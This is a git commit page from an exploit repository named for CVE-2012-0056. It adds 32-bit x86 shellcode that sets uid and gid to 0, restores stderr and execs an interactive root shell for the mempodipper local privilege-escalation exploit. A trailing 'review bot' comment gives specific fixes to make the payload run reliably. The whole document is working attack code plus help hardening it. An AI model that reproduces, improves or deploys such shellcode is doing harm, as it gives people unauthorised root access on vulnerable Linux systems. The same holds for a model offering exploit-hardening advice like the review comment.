author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 06:16:39 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 06:16:39 +0100 |
commit | 14b33f1b7c5c761cc089dede4fa6aeb187ff66ac (patch) | |
tree | df5f2aed70c872d7bc3059e2dc6de6c78fb17f90 /shellcode-32.s | |
parent | Add custom 64bit shellcode and preserve stderr. (diff) | |
download | CVE-2012-0056-14b33f1b7c5c761cc089dede4fa6aeb187ff66ac.tar.xz CVE-2012-0056-14b33f1b7c5c761cc089dede4fa6aeb187ff66ac.zip |
Add 32bit shellcode.
Diffstat (limited to 'shellcode-32.s')
-rw-r--r-- | shellcode-32.s | 53 |
1 files changed, 53 insertions, 0 deletions
diff --git a/shellcode-32.s b/shellcode-32.s
new file mode 100644
index 0000000..d08b93f
--- /dev/null
+++ b/shellcode-32.s
@@ -0,0 +1,53 @@
+BITS 32
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor ebx,ebx
+mov al,0x17
+int 0x80
+;setgid(0)
+xor ebx,ebx
+mov al,0x2e
+int 0x80
+;dup2(6, 2)
+mov bl,0x6
+mov cl,0x2
+mov al,0x3f
+int 0x80
+
+
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+xor eax,eax ; eax = 0
+push eax ; push eax
+push 0x68732f6e ; push //bin/sh
+push 0x69622f2f
+mov ebx,esp ; set ebx (arg 1) to top of stack
+
+xor edx,edx ; edx = 0
+mov dx,'-i' ; edx = '-i'
+push edx ; push edx to stack
+mov eax,esp ; set eax to top of stack
+
+xor edx,edx ; edx = 0
+
+; so at this point:
+; ebx is a pointer to '//bin/sh'
+; eax is a pointer to '-i'
+; edx is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push edx ; push edx to stack
+push eax ; push eax to stack
+push ebx ; push ebx to stack
+mov ecx,esp ; set ecx (arg 2) to top of stack
+
+xor edx,edx ; rdx (arg 3) = 0
+
+xor eax,eax
+mov al,0xb ; al = 0x3b, which is the exec call
+int 0x80 |
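Review bot: The first two syscalls rely on partial-register writes into registers whose upper bytes are never cleared: `mov al,0x17` for setuid(0) runs with eax's upper 24 bits left at whatever the hijacked code left there, and `mov cl,0x2` for dup2(6, 2) runs with ecx never zeroed, so the syscall number and the target fd are only correct by luck of the entry state (the later setgid and dup2 numbers are fine only because setuid(0) returned 0 into eax, which also means a failed setuid poisons every subsequent `mov al`). Add `xor eax,eax` before `mov al,0x17` and `xor ecx,ecx` before `mov bl,0x6`, matching the `xor eax,eax` already used before the execve number; both are two bytes and NUL-free. Two comments are copy-paste leftovers from the 64-bit variant and should read `; al = 0xb, which is execve on i386` and `; edx (arg 3) = 0`, since 0x3b and rdx are x86-64 values that do not apply to this `int 0x80` code. The header comment could also state the precondition that fd 6 must already hold the saved stderr, as nothing here checks the dup2 return value.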